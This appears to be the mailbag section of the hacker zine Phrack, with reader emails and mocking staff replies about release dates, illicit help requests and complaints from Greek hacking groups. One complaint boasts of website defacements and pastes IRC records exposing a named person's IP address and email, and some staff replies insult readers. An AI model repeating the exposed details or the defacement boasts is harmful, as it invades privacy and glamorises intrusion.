    [ Sounds like it would change my life. ]

Help Center: http://help.orkut.com/support/

    [ To tell you the truth, help won't be necessary at this point :> ]

                                    ---

From: ***** ***** <thehackernews@gmail.com>
Subject: Invitation to connect on LinkedIn

LinkedIn
------------


I'd like to add you to my professional network on LinkedIn.

- *****

    [ What if we do not intend to do business with you? ]

**** ****
Owner at The Hacker News
New Delhi Area, India

Confirm that you know **** *****
https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/

--
(c) 2011, LinkedIn Corporation


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x01 - <?php include($teaMp0isoN) ?> ]=----------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Poison Blog <p0isonblog@ymail.com>
Subject: TeaMp0isoN: Issue 1

My first ever zine, read it and let me know what you think. hoping it gets
published in the next phrack magazine.

    [ Hem. So basically this is a new concept: publishing a zine inside
      another zine. And we even got 0day-hashes in the process. WIN/WIN ]

- TriCk


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x02 - The usual mails  ]=-----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


    [ Have you ever been curious about the kind of mail we are used to
      receive? Let's have a taste. ]

                                    ---

From: skywalker <oyyj07@gmail.com>
Subject: how can I get the source code

hello, I found some source code in phrack Magazine, but it is attach with
text mode, how can I get it?

    [ Download the paper in "text mode". Then comment everything inside
      that is not the code you want to compile and fire gcc.
      It might work. If it doesn't mail nikoletaki_87@yahoo.gr for help. ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: Phrack issue 58

How can i get the binary-encryption.tar.gz
from the article Runtime binary encryption?

    [ You can't; it's encrypted. I think oyyj07@gmail.com has the password.
      You should get in touch with him. ]

                                    ---

From: stephane.camprasse@free.fr
Subject: edition 64 infected by OSX:Niqtana

Hello there,

tar.gz of the magazine number 64 appears to be infected:

http://www.sophos.com/en-us/threat-center/threat-analyses/
viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx

    [ Wow. Sounds like a serious issue. What should we do? ]

Kind Regards

Stephane Camprasse, CISSP

    [ At first we wanted to laugh, then we saw you are serious business. ]

                                    ---

From: Domenico ****** <jmimmo82@gmail.com>
Subject: Mailing Lists Phrack

Dear Phrack Staff

I would like to subscribe at mailing lists of Phrack but email
addresses provided by the site not exist.

    [ That's because there is no ML, dude. ]

What do you advise me?

    [ Well, keep looking. ]

Best Regards
Domenico *******

                                    ---

From: Robert Simmons <rsimmons0@gmail.com>
Subject: phrack via email

Do you have a mailing list that sends phrack out via email, or at least an
email reminder to go download it?

    [ We don't. What would be the point in a bloggo/twitto world where
      information spreads that fast? ]

Rob

                                    ---

From: Elias <thesaltysalmon@gmx.com>
Subject: How do i subscribe?

As the title says, how do i subscribe to Phrack?

    [ Since you're not polite we won't accept your subscription. Don't
      mail us again. Please. ]

                                    ---

From: William Mathis <scotti@uniss.it>
Subject: One paper can change everything!

    [ New submission???? :D ]

What do I mean? Of course the Diploma.

    [ 0wned. Deception is part of the game :-/ ]

It is no secret that the knowledge, skills and experience play a crucial
role in getting the desired position, but despite the formality when
applying for a job essential requirement is a diploma! At the moment
receive a diploma is very expensive, takes time and power.

ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND
EXPERIENCE!

    [ Can we send our order in via PDF? You have to open it with
      Acroread 9.x though, since you're only worth an 0lday to us.
      Thank you for playing "rm me harder" w/ phrackstaff! ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x03 - Desperate house wifes  ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Luna Tix <lunatix@linuxmail.org>
Subject: A request regarding pdf files

   [ Our resident Adobe consultant is currently on holidays. We do have our
     .txt specialists however. ]

Hi,

I have downloaded some adobe 3d files from a website, and need them to be
converted into autodesk inventor ipt files.

    [ You've knocked on the right door. ]

Can you teach me how to do this? If yes, I can send you some of the files
for trial, if you are successful, I am willing to pay for it.

    [ Excellent! How much can you pay exactly? Our local liquor store no
      longer accepts PDF conversion techniques in exchange for beer. ]

All the best.

Luna

                                    ---

From: sabrina <sabrina*******@gmail.com>
Subject: don't know where to go


hi,
i'm in need of someone to help me in a cyber cat burglar kind of way.
i've tried all the legal ways... police, fbi, fed trade commission all to
busy with terrorist.

    [ Now that they've caught Osama, they should have some free time. Try
      to contact them again. ]

i can go to a detective then civil lawyer but that would take way too mush
time and an exorbitant amount of money.

   [ Clearly, you've mistaken us for the cheap option. ]

i need someone to find information
on exactly where someone is located. i have email address, cell phone and
bank account numbers ...

    [ Do you have GPS coordinates? ]

I'm hoping to find or at least be lead to some one who is very creative in
using their computer. my only goal is to locate this person, i'm not out to
steal or do any harm.

    [ I know some very creative people. They compose music on their
      computer! For realz! Would that help you? ]

if you think you can help me i'll give you my phone number,  i can then
better explain why this way for me would be the only way to go,  i lost 20
years of my life's hard work, i just want to locate this person.

    [ Wow, sorry for being so hard on you with the previous comments,
      Sabrina. It is obvious to us now that you are clearly retarded.
      Please leave a comment on the website with your phone number. We'll
      get back to you. ]

thank you
sabrina


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x04 - Cooperation  ]=---------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Monika ****** <monika.******@software.com.pl>
Subject: cooperation

Dear Sir or Madam

    [ It's professor actually. ]

My name is Monika *********. I represent Hakin 9'- IT Security magazine
(for more details, please see our website www.hakin9.org). I would be very
much interested in long term cooperation with your company.

    [ Our company? :D ]

We would co-promote our services and spread the information on IT Security
together.

    [ Well the problem is that we don't have that many services:
        - 7-bit cleaning of ASCII papers, we are considered the market
          leaders in this service
        - Spam hunting with advanced regexp (i.e. matching ANTISPAM in the
          subject)
        - Mail storage, no backups though :(
        - Technical review of papers when we understand them
      See? That's not too much :-/
      But thanks for the kind offer. PHRACK could totally use the promotion
      of such a well established magazine as h8king (or whatever). ]

 I am really looking forward to hearing from you.

    [ Don't call us, we'll call you! ]

 Best Regards,

Monika ********

Software Press


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x05 - Help is requested! (again) ]=-------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Kevin **** <********@att.net>
Subject: Help with Persistent BIOS Infection

Hope you can help. I have a small video business and from my son's school
flashdrive my network of computers are infected with Persistent BIOS
Infection. My hard drive's have been rearranged with FAT segments and i
believe is running my XP/Win7 OS's as a virtual machine.

    [ Unfortunately Joanna is not part of the staff. But we have the
      feeling that your analysis of the situation could be improved :> ]

This has caused my rendering performance to be ruduced by 50%. Also when i
make DVD's the infection is on the disc and from complants it infected
other machines. My software is legit and i don't download anything.

    [ Of course. Who does anyway? Your son perhaps :> ]

I'm new (6yrs) to computers, i some what know what to do but not really.

    [ So you know but you don't know. That's good, have the half of you
      that knows guide the other half that doesn't. You can't go wrong. ]

I have killed my network and now keep all computers separate but know
somehow i will get the infection back.

    [ You killed the poor network? :-/ ]

Could someone make me a batch file or better yet a ISO to boot and fix my
Bios and memory so it has Persistent BIOS Infection that is null. Giving
back my rendering power. Making it so i can't get this infection again.

   [ Just a thought: maybe if you didn't run arbitrary batch files that
     "someone" sent you, you wouldn't have this problem in the first
     place. But most probably that's not it. It must be a 'Persistent BIOS
     Infection' problem. ]

Maybe send me a zip file to my email address. Pleezz
I would be more than happy to donate for the cause.

    [ And yet another person willing to give us money. We should really run
      a company :D ]

Thank You
Kevin ****
*******@att.net

                                    ---

From: shashank **** <**********@gmail.com>
Subject: hey

hey,
i was searching some hacking forums site, & found one of the "phrack
Magazine".

    [ Then you failed. It's not a forum kid :) ]

It was pretty interesting. Can you help me out on how to hack Steam
Account.

    [ Do you have a paypal account? ]

                                    ---

From: David ***** <dfg******@yahoo.com>
Subject: RootKit Iphone 4g

Hey i was recently on your website and well i was looking for something to
mess with my friends, see were all in the same class and we all connect to
the same network/router thing, and you hve to login to gain acess to the
network, so i was wondering if there was a way to control my friends
computer with mine while were hook to the network.

    [ XD ]

DoFoG



[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x06 - About the scene philes ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Prashant KV <bug@null.co.in>
Subject: Thank You

    [ You're very welcome. ]

Hi,
I would like say thanks each and every individual in Phrack team for
publishing our article. This will go a long way in creating awareness about
null community.
Thanks all....

    [ And thank you for the scene phile. Always a pleasure to exchange with
      interesting/nice people. ]

                                    ---

From: Hackers News <thehackernews@gmail.com>
Subject: Article Editing

    [ HEY!!! You're the guy who tried to befriend us on linkedin!!! ]

Hello Sir,
We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We
read an article on your Website :
http://www.phrack.org/issues.html?issue=67&id=16#article
I wanna ask you that on what basis you write about "*Indian Cyber Army :
http://www.cyberarmy.in/*" .

*   Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
    fake ICA by the actual ICA group. One glance at the website content
    tells you that there is some truth to what the actual ICA(indishell)
    guys and other say and reminds you of the infamous plagiarism cases
    (Ah! Any Indian h4x0r's favourite topic when they feel like bitching
    about something :-P)*

*Whatever you write is not fair and I think it represents the mistake
done by you, that you write about a group without knowing about them,
Read This : *

*http://www.cyberarmy.in/p/about-us.html*

*and I think you should 1st know about it. Hope you will edit the
article.... as soon as possible.*

    [ You may or may not be right and clearly we don't have enough
      information to judge. For the sake of the truth and freedom of
      speech, we are posting your comment. ]

*Thanks,*

    [ No prob dude. ]

*Owner*

*The Hacker News...*

                                    ---

    [ The following is a mail that we received several times between the
      21st and the 22nd of June... As we said in the introduction, a few
      greek people were angry because of the scene phile. Because we're
      (not that much) bastards, we felt that these people deserved the
      right to be published as well. So here it is...

      Oh and they even pasted it in the comments! ]


From: xak xak0r <xak3ri@hotmail.com>
Subject: Greek Hacking Scene is alive!

From: Unkn0wn <unknown.ws1@gmail.com>
Subject: GHS - read this message

From: Spyros Kous <spirou1988@hotmail.com>
Subject: GHS for you.

From: nikos piperos <piperos_22@hotmail.com>
Subject: By <GHS>

From: ****** ******* <deathlyrhymer@hotmail.com>
Subject: greek.hacking.scene

    [ Sorry, due to ASCII constraints we had to censor the name of this
      guy :D ]

From: Stephen O'Neill <apple-whore@hotmail.com>
Subject: 0xghs

    [ You've got your hex wrong dude ]

From: Brian Higgins <bhiggins69@hotmail.com>
Subject: **************************

    [ Hey next time write the subject in english please :) ]

From: eibhlin mcnamara <mcnamara105@hotmail.com>
Subject: G*H*S - always here

    [ A sibling of Sean maybe? ]

From: nikpa pfcc <aeknik@hotmail.com>
Subject: Greek Hacking Scene - Read your errors

From: nikpa papaa <nikpa21@gmail.com>
Subject: Greek Hacking Scene - Read your errors

   [ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of
     you guys delivered. Worst Greek Hacking Scene evar! Would not order 
     from you again. ]

From: NIKO*** *ANTAZO*OY*** <aeknik@yahoo.gr>
Subject: Read this, about errors - GHS

    [ This one had his name only partially encrypted. ]

From: kondor fromGHS <kondorghs@gmail.com>
Subject: Greek Hacking Scene

    [ Hey Kevin Mitnick? :) ]

Nice to see Greek Hacking Scene on Phrack, but very sad to say that there
is no connection of all those with reality. This post represents something
that even doesn't exist except theory.

In the other hand, is not mentioned technological steps and targets that
Greek Hacking Scene archived, not in theory, but in actions.

However in the References i see nothing trust source, while you avoid posts
on newspapers, magazines and tv about Greek Hacking Scene.

Maybe Phrack can't handle the name of GHS and writing about fantasies.
Greek Hacking Scene is not a group, team or crew etc. but is ideology of
decades, is not about fame, but is about targets, technology and advance.
You must know that GHS does NOT follow things such "Hackers Manifesto" and
is well known that this person take back what he said about this manifesto
in shake to save him from things. He even does NOT defence his ideology,
how then we can accept such thing?! Basically we are what we create and we
gonna call hacking what we think hacking is, you can call us as you want,
but this can't change our actions, we not negotiate our ideology and we are
not followers of any paid, fantasy or theory ideologies. We rage against
machine, the system. Is good that Phrack exist cuz keep the magic to those
who want to be related with hacking. While you keep the feeling of magic to
your readers, we know that is all about coding, methodology and how far
each mind can think to do things.

For those who forgets, security is a part of hacking, security is not
hacking. Hacking is every electronic violation, violation doesn't mean that
is illegal always. As a term, hacking is every electronic violation.

About Greek Hacking Scene you forget to mention a lot of groups and people
(and is not about names) who they did things and they left lot of stuffs
behind. Those people and groups they never care about their nicknames or
the name of the group cuz is useless, can be any nickname or group name, at
the end what it left, is what had created. Who make it, it doesn't matter
really cuz those who make it as share they do it cuz they want.

If is to write about things that are not related with the true and reality,
better don't write about Greek Hacking Scene. You can write for posers and
others who they want fame, but not for GHS. You can write fantasy, stories,
anything you like, but as long as is not connected with reality and true,
then don't write about Greek Hacking Scene. Maybe you can write for any
other Greek Hacking Scene you want or you believe, but mention also that is
not connected all those stories with Greek Hacking Scene (GREEK SENTENCE).

    [ GREEK SENTENCE is something written in greek that we could not
      translate nor write in the phile because of the greek alphabet. ]

Cheers,


Your article forgets to write about DefCon meetings that take place in
Greece, and of course about the unique Codehack meetings that shows live
Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or
what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the
references on magazines, newspapers and tv? What about the members of Greek
Hacking Scene that works on penetration testing companies or making atm
softwares and banking or those who works in known computers and servers
companies and they create technology?!

About the grhack (that nobody knows) is those guys from auth that got
hacked their servers and their pcs and tooked personal files of them?

Check this link:
http://zone-h.org/mirror/id/6638423

I read slasher?! This person who has the grhack site that you took as
reference?! With the name ********** **********?!

    [ Publishing an individual's real name is against our rules. You
      got away with it in the comment section once. ]

Oh come on, i have also beautiful pictures who they poser as engineers!
Oh now i got it! They write about their selfs! How smart... what a fame...
what a pose!

Before you write anything about Greek Hacking Scene take a look to the
targets. We have down anarchist such indymedia sites, and also nationalist
sites, as well he hacked into Goverment sites, political parties, national
services, and of course all the hacking-security related greek sites who
they offer only theory and lies that has no connection with reallity and
hacking.

And i guess so you promote the Anarchy?! So don't forget Phrack to mention
that everything you wrote is about Anarchy, not about hacking.

Greek Hacking Scene has members from all political sides and we have things
in common we work for.

This is grhack.net, this is the guy that send hopeless messages to google
blogspot to DOWN the info that SpyAdmin post, passwords, files, everything!


->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo)
->> Slasher is on: #grhack #anarchy


--ChanServ-- Information for channel #grhack:
--ChanServ--         Founder: Slasher
--ChanServ--     Description: GR Hack - http://www.grhack.net
--ChanServ--      Registered: Aug 05 21:36:46 2010 EEST


--NickServ-- Information for nickname Slasher:
--NickServ--          Realname: LoCo En El CoCo
--NickServ--   Is online since: Dec 21 17:26:15 2010 EET
--NickServ--   Time registered: Oct 25 23:22:13 1999 EEST
--NickServ-- Last quit message: Ping timeout
--NickServ--    E-mail address: slasher@grhack.net
--NickServ--           Options: Kill protection, Security, Private
--NickServ-- *** End of Info ***


Maybe spyadmin is closed by google blogspot after the emails of grhack.net
Slasher cuz the stuff is related about him

but look the comments of this website and the date, to know the existance
of spyadmin

http://press-gr.blogspot.com/2007/09/blog-post_3165.html

(SOMETHING IN GREEK...)
    spyadmin.blogspot.com
    (SOMETHING IN GREEK AGAIN)
    (7 September 2007)

Now look also the date of the defacement in the zone-h digital archive:

http://zone-h.org/mirror/id/6638423

and look the date too,
# Mirror saved on: 2007-09-08 13:58:32
# * Notified by: GHS
(8 September 2007)

---

Greek Hacking Scene has no colour and does not support any political side.

Take example to indymedia athens, i will give you 2 links, in the first
they say that GHS is nationalist and hack their website, and in the other
link on the same website, they give congratulations in GHS cuz they did
actions and defacements according to left ideology.

In fact GHS has it's own ideology and act as GHS believe.

1 link:
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D706934

2 link:
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D620090

The comments are yours, let see the Freedom of Speech now, the TRUE the
REALITY, the FACTS!

Somes they didn't learn from their mistakes. GHS has no hate for anyone and
act not for revenge causes or anything else. According to all our actions,
we do warning and when we act we just put the informations as is, we don't
put sauses, you put sauses maybe.

The reason i wrote this is the true and reality.

Before some years there are many "hackers" in Greek chat rooms etc, they
speak about theory and when kids comming to learn, they laught only at them
and they make those kids to become like them, liers without education and
knowledge, kids that become like them, to know just some words, theory
without they know what for they speak about and to spend lost time chatting
and destroy other kids comming. Members of GHS hacked and take access in
most and almost all Greek websites, chat rooms, irc servers etc, that was
security-hacking related. We are always here, maybe not the same persons,
but members of GHS are change all the time and keep the safe ideology. In
the other hand, we let teenagers who are interested to hacking, we turn
them to coding, to let them think their future, education, freedom ideas
and to let them want to do things and create. Defacements and Hacking are
our fireworks to let them get the magic and on the way to show to them that
there are so many tools and things on net to hack a website and hack, but
if you want to go more further, you have to learn coding, to explore, to
let your mind free and think far away, for what can be happen and what not.
To go a step further with their minds, not by giving them stuff in the
plate, but let them do it and explore it by their selfs! I know keeps that
believe and do things, on the way they do things and go advance, those kids
are the next cycle of GHS who will pass the same ideas, believes and
technology to the next generations.

Greek Hacking Scene 2010.

    [ All we can say is 'What?' ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x07 - Interesting mails ]=----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: "L. *****" <l.*******@yahoo.com>
Subject: idea for next profile

my you should do a hacker profile on j3ster since he is one of the most
prominent hackers that I've heard about out there,

    [ Dunno the guy. We already chose one anyway. You may have heard of
      him. ]

or do one on that rat who turned in bradley manning

    [ The saying is not: Snitches get Prophiles. ]


                                    ---

From: infosec <infosec@cyberdo.net>
Subject: Release date?

Hi Guys,

Firstly, let me thank you for the on-going release of this great
e-zine.

   [ You're welcome. ]

Most of these e-zines surfaced and then disappears over the horizon yet
albeit the long term delays in-between releases :)you've kept this
going.
Thank you.

    [ ^_^ ]

I am very much interested in the up and coming release and would like
to know the date or drop us a note on the website.

    [ Done. ]

Also, I'd like to know how to join phrack team of staff.

    [ There is a GREAT mystery about how the phrack staff acquires
      members. Sorry dude, there is currently no open spot :) ]

Greetz,
infosec

                                    ---

From: Zagan Hacktop <zagan@live.co.uk>
Subject:

YO!
do you still have an IRC?

    [ We do. But it's a private one. We may open a public or half-public
      one someday... Don't hold your breath however. ]

                                    ---

From: daniel ***** <******@gmail.com>
Subject: new age LoD

hi am a head of a team that disided that LoD
is a legacy and cant just disappear... it must be reborn or the web will
loose alot and with the way things are going today
the web realy cant efored it or it will eventualy die for the simple
user...

we are looking for the original LoD members (or at list any way to
comunicate with them)
(specialy for night lightning)

if this information can be passed to them it would be realy nice.. all we
want is a some advice (not technical) ...


my email is ******@gmail.com (nick: galeran).
if you can help please do
thanks

    [ Not sure about the true intentions but anyway this might help.]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x08 - Greek people are angry  ]=----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


    [ For clarification purposes, we received this mail after we released
      the index and before we released the philes. ]

                                    ---

From: Iordanis Patimenos <iopatmenos@yahoo.gr>
Subject: Phrack 67

    [ So what, another greek? At least this one is not complaining about
      the scene phile ;) ]

YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack
 mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only
thing you had to do was to let the knowledge flow.

    [ The only thing? Such a nice little kid daydreaming :) ]

What to do the info in 'Scraps of notes on remote stack overflow
exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under
Unix/VMS' (FORTRAN wtf),

    [ FORTRAN... indeed :') We'll do something about COBOL as well (it is
      'safe' so no memory corruptions, something else). We'll keep you
      posted. ]

'A Eulogy For Format Strings' if we cannot apply on current protection
mechanisms.

    [ Well that's the point. You can. Oh wait, you would have known if 
      you had kept your sorry mouth shut and actually read the papers 
      first :> ]

New edit or better you didn't publish this new fucking delayed, bad content
phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded
content you provided after all this waiting time!!! Not a chance to compare
to previous phrack issues. This issue is just a joke, nothing more, happy
1st APril assholes, you made PHRACK seems trash magazine.

    [ The cool thing with morons like you is that it would be pointless to
      explain things, which makes our job somewhat easier. Congratulations
      for your participation in p68, you've made it ;-) ]

-Fan of Phrack-

    [ Yes. It shows. ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON

    [ Another desperate housewife? The name is familiar...]

YOU ARE SO FUCKING FUNNY

    [ WE DO HOPE WE ARE ]

I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE
THAT YOU TRIED TO ADVERTISE AS A BIG HIT)

    [ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ]

JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL

    [ NOT IN JUNE, WE ARE *ALWAYS* LATE ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON

Group: The Phrack Staff

    [ Hum, it seems that you have fixed the capslock problem.
      You're elite. ]

Most *FAIL* group ever in phrack, you hurt the magazine go away.

    [ Hey now I remember you!!! :) It looks like you are obsessed with us.
      You must be our number one fan in greece. Even now that we have so
      many greek fans. ]

    >>>>>>>>>> From earlier >>>>>>>>>>
    From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
    Subject: Phrack issue 58

    How can i get the binary-encryption.tar.gz
    from the article Runtime binary encryption?
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    [ So:
        1. Did you manage to download the file? :)))))
        2. *EPIC* *FAIL*?
    ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: New phrack issue

    [ What? You again? ]

Marry Christamas :) and happy New York

    [ LOL. You're doing it wrong! ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: ***** ******** <darkjoker93@gmail.com>
Subject: ANTISPAM

Hi guys :)
Here's an article I've just written, I know it's a bit late for the
submissions, but perhaps you may publish it in the next issue. Anyway, the
topic is how to bypass a captcha, and, in particular, how to bypass the one
on your site :). No offense, but it's really weak.

    [ None taken. We simply took the first capcha mechanism available on
      the web which was not going to get us owned. However we got spam,
      that's for sure, sorry about that fellow readers. ]

If you don't find it interesting please at least change your captcha
because I'm really sick (and I'm sure I'm not the only one) of reading
spam messages (I swear it was not me :).

    [ We'll do both so that you can get better :> ]

I'm italian, therefore my english is not very good,

    [ Nobody's perfect! ]

if the paper is so bad written it can't be even read, send it back to me,
I'll try to rewrite it in a better way.

Bye,
darkjoker

    [ And that's the story of how his contribution got published in
      Linenoise. Thx darkjoker. ]

                                    ---

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Barak ***** <barak*****@gmail.com>
Subject: Question

    [ This one is not the current president of the US, we checked. ]

Hi,

I have been following the magazine for a while now and I have been waiting
for the new issue. Last I checked it was suppose to come out in June...
Can you let me know when I should except the new issue?

    [ Are you reading this? Then issue #68 is out. You're welcome. ]

Barak

    [ That's the problem with every issue, you should NEVER trust us when
      we announce dates ;) ]

                                    ---

From: Rodri ***** <rodrigo******@hotmail.com>
Subject:

    [ Hey ANTISPAM is missing! ]

Hello,

For godsake we are already in June!

    [ Sorry about that bro :) ]

Now seriously and kindly is it coming out soon?

Best regards.
Roders.

                                    ---

From: LEGEND XEON <legend.xeon@gmail.com>
Subject: Phrack 68th Issue Release

Hello mate,
I am very interested in upcoming 68th issue of phrack.
The whole world is counting on you!!

    [ The whole world? Not even the whole scene mate ;) ]

I just want to know when will be the release and can you give me a glimpse
of contents inside it.
I will be eagerly waiting for your reply.

    [ Hehe, hope you didn't wait too much. ]

~Legend_Xeon

                                    ---

From: fernando ****** <core******@gmail.com>
Subject:

my life gets duller every day you don't release the new issue

    [ Let's hope this one didn't commit suicide before we released :| ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0B - Students project? ]=----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: "(s) Charmaine Anderson" <Charmaine.Anderson@students.newport.ac.uk>
Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications

To whom it may concern,

I am contacting you to tell you about my final year project for my degree.
I would be very grateful if you were able to follow my progress and perhaps
 also contribute any tips and ideas. I will also be writing an application
which, if successful, I will be posting online for download.

Using the RC5 block cipher and the competitions run by RSA Laboratories
(1997-2007) as benchmarks, experiments will be conducted using different
methods of distributed computing. The implications of the results will lead
to a better understanding of how cryptanalysis can be conducted through
areas such as grids and internet-based cloud computing or virtualisation.

The reason for this project is that distribution methods have been used for
many years in order to conduct cryptanalysis; however, I have noticed that
this has been for purposes such as testing the security of new ciphers and
creating a better understanding of how they work. But, to my knowledge,
there has been little-to-no research into the implications of real-world
attacks through distribution.

To summarise, I plan to test the limits of computational security in order
to expose the possibility of real-world cryptanalytic attacks using the
'unlimited' computing power that is slowly becoming available to the
public.

It is possible to follow the progress of this project through
http://www.distributedcryptanalysis.co.uk/. A number of blogs are also
being used in order to attract more interest, links to these will be posted
on the website very shortly.

Yours Sincerely,

Charmaine Anderson

BSc (Hons) Forensic Computing
University of Wales, Newport

    [ Well he seemed to be a good kid so we published his mail ;) ]

                                    ---

From: Johannes Mitterer <johannesmitterer@googlemail.com>
Subject: Hacker's Manifesto

Dear Phrack-Team,

currently I'm working on my bachelor's thesis part of which is an analysis
of The Mentor's Hacker's Manifesto. In this context, there's little
confusion about the question how the manifesto was first published. As I
understand it, the manifesto was first published ONLINE in phrack magazin,
whereas my professor stated that the first issues of phrack including Issue
#7 in which the manifesto was published were only available offline as a
printed version and later put on the internet. Perhaps You could help me
clearing up this confusion.

    [ Wasn't the early edition of phrack all scene .txt philes on BBSes?
    Like, #7 was pre internet for sure. I doubt that any of the editors
    back then would have bothered printing hardcopies, since it is
    extremely inefficient and expensive and the target audience is ppl w/
    computers. ]

Thanks in advance!

Yours,
Johannes Mitterer

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: kimberly - <*******@hotmail.com>
Subject: Graduate essay

Hello Staff,
We are senior high school students from 'Stella Maris College' in the
Netherlands and we are writing an essay about the reputation of hacking. If
it is okay with you, we would like to ask a few questions:
- How could you start the site, because hacking is illegal and it might
  endanger your users who discuss hacking?

    [ Wait it's illegal? We're shutting down the site immediately :| ]

- Have you ever gotten negative/positive reactions to your site? And what
  where those reactions?

    [ Well everything is in this file :D ]

- Is there any information that is not known to people who are not hackers
  and that is not easy to find in books or the internet? If so, where could
  we find this information?

    [ IRCS? Nah it's just for the chitchat :) ]

- Is there anything in your opinion that is so important, that we can't
  possibly leave out? We would be very happy if you could answer these
  questions or forward this email to someone who might know more about
  this.

    [ I'm not too sure you guys will be able to graduate with that many
      questions so good luck :D ]

Thank you very much in advance!
- Dingding and Kimberly

                                    ---

From: Eva ******* <*****@gmail.com>
Subject: Article

Dear Phrack Staff,

I'm preparing an article concerning some hacks to Linden Lab's SecondLife
viewer and I would like to publish the results in your magazine. Could you
please, if possible, provide some details where and to whom I should send
it to and if there are any requirements I must fulfil.

